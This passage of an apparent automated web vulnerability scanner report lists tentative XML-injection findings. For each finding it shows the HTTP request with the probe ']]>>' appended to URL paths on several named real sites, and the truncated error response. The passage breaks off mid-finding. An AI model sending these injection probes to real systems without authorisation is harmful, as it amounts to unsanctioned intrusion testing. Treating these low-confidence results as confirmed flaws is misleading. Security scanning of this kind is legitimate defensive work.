<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.102. http://controlcase.com/professional_pen_services.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /professional_pen_services.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /professional_pen_services.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:20:53 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.103. http://controlcase.com/professional_pen_services.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /professional_pen_services.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /professional_pen_services.php]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:26:34 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.104. http://controlcase.com/professional_vendor_management.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /professional_vendor_management.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /professional_vendor_management.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:22:05 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.105. http://controlcase.com/professional_vulnerability_scan_services.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /professional_vulnerability_scan_services.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /professional_vulnerability_scan_services.html]]>> HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=f4764231133ed3c705cc7d27a7b0b2ed; _pk_id.3.4216=e72cf29c5d1c4bcd.1303664485.1.1303664724.1303664485; _pk_ses.3.4216=*; __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.11.10.1303664485

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:16:34 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.106. http://controlcase.com/resource_collateral.htm [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /resource_collateral.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /resource_collateral.htm]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:27:52 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.107. http://controlcase.com/software.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /software.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /software.php]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:19:41 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.108. http://controlcase.com/software_vendor_manager.htm [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /software_vendor_manager.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /software_vendor_manager.htm]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:20:18 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.109. http://controlcase.com/software_vendor_manager.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /software_vendor_manager.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /software_vendor_manager.php]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:26:35 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.110. http://controlcase.com/team.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /team.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /team.php]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:25:57 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.111. http://data.whicdn.com/images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://data.whicdn.com
Path:   /images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg?1263334693 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: data.whicdn.com

Response

HTTP/1.1 404 Not Found
x-amz-request-id: A05988CEAD25925D
x-amz-id-2: KNXvDL6ALp8tjbxLMsX5oKrAVAblkIYeFBI+RsdcyloSRi17MBXClUYs1SCdEdQL
Content-Type: application/xml
Date: Sun, 24 Apr 2011 12:47:57 GMT
Server: ATS/2.1.4-unstable
Age: 0
Proxy-Connection: keep-alive
Content-Length: 328

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>images]]&gt;&gt;/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg</Key>
...[SNIP]...

10.112. http://data.whicdn.com/images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://data.whicdn.com
Path:   /images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/1311756]]>>/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg?1263334693 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: data.whicdn.com

Response

HTTP/1.1 404 Not Found
x-amz-request-id: CD4C25CE6283E9D1
x-amz-id-2: OsaSJ4av7UqC8NO0NRk6wbvSsGo6u6iapaL0YZjakkvS/xMV6uYplOauYQkajPEp
Content-Type: application/xml
Date: Sun, 24 Apr 2011 12:48:04 GMT
Server: ATS/2.1.4-unstable
Age: 0
Proxy-Connection: keep-alive
Content-Length: 328

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>images/1311756]]&gt;&gt;/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg</Key>
...[SNIP]...

10.113. http://data.whicdn.com/images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://data.whicdn.com
Path:   /images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg]]>>?1263334693 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: data.whicdn.com

Response

HTTP/1.1 404 Not Found
x-amz-request-id: 71624C2808095279
x-amz-id-2: NMg6cva34xdIFxAV460dMjtNILalvH/SqQRxmXMTJTSkE961cz+kTQyBA0dE+bhA
Content-Type: application/xml
Date: Sun, 24 Apr 2011 12:48:18 GMT
Server: ATS/2.1.4-unstable
Age: 1
Proxy-Connection: keep-alive
Content-Length: 328

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg]]&gt;&gt;</Key>
...[SNIP]...

10.114. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://delivery.ctasnet.com
Path:   /adserver/www/delivery/tjs.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adserver]]>>/www/delivery/tjs.php?trackerid=276&append=1&r=96277 HTTP/1.1
Host: delivery.ctasnet.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2182862;type=websi010;cat=homep146;ord=1;num=8709666307549.924?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 24 Apr 2011 12:10:28 GMT
Server: lighttpd/1.4.26
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.115. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://delivery.ctasnet.com
Path:   /adserver/www/delivery/tjs.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adserver/www]]>>/delivery/tjs.php?trackerid=276&append=1&r=96277 HTTP/1.1
Host: delivery.ctasnet.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2182862;type=websi010;cat=homep146;ord=1;num=8709666307549.924?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 24 Apr 2011 12:10:33 GMT
Server: lighttpd/1.4.26
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.116. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://delivery.ctasnet.com
Path:   /adserver/www/delivery/tjs.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adserver/www/delivery]]>>/tjs.php?trackerid=276&append=1&r=96277 HTTP/1.1
Host: delivery.ctasnet.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2182862;type=websi010;cat=homep146;ord=1;num=8709666307549.924?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 24 Apr 2011 12:10:40 GMT
Server: lighttpd/1.4.26
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.117. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://delivery.ctasnet.com
Path:   /adserver/www/delivery/tjs.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adserver/www/delivery/tjs.php]]>>?trackerid=276&append=1&r=96277 HTTP/1.1
Host: delivery.ctasnet.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2182862;type=websi010;cat=homep146;ord=1;num=8709666307549.924?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 24 Apr 2011 12:10:45 GMT
Server: lighttpd/1.4.26
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.118. http://home.controlcase.com/piwik/piwik.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://home.controlcase.com
Path:   /piwik/piwik.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /piwik]]>>/piwik.php?action_name=ControlCase%20-%20GRC%20Managed%20Compliance%20PCI%20SOX%20GLBA%20HIPAA%20FISMA%20ISO%2027002%20Security%20Regulations%20Software%2C%20Services%2C%20Certification%2C%20Governance%2C%20Risk%20Management&idsite=3&rec=1&rand=0.29818993154913187&h=12&m=1&s=24&url=http%3A%2F%2Fcontrolcase.com%2F&urlref=&_id=e72cf29c5d1c4bcd&_idts=1303664485&_idvc=1&_idn=1&_ref=&_refts=0&_viewts=1303664485&pdf=1&qt=0&realp=0&wma=0&dir=0&fla=1&java=1&gears=1&ag=1&res=1920x1200&cookie=1 HTTP/1.1
Host: home.controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:29:39 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1048

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.119. http://home.controlcase.com/piwik/piwik.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://home.controlcase.com
Path:   /piwik/piwik.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /piwik/piwik.php]]>>?action_name=ControlCase%20-%20GRC%20Managed%20Compliance%20PCI%20SOX%20GLBA%20HIPAA%20FISMA%20ISO%2027002%20Security%20Regulations%20Software%2C%20Services%2C%20Certification%2C%20Governance%2C%20Risk%20Management&idsite=3&rec=1&rand=0.29818993154913187&h=12&m=1&s=24&url=http%3A%2F%2Fcontrolcase.com%2F&urlref=&_id=e72cf29c5d1c4bcd&_idts=1303664485&_idvc=1&_idn=1&_ref=&_refts=0&_viewts=1303664485&pdf=1&qt=0&realp=0&wma=0&dir=0&fla=1&java=1&gears=1&ag=1&res=1920x1200&cookie=1 HTTP/1.1
Host: home.controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:29:43 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1048

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.120. http://kroogy.com/search/images/blank.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://kroogy.com
Path:   /search/images/blank.gif

Issue detail

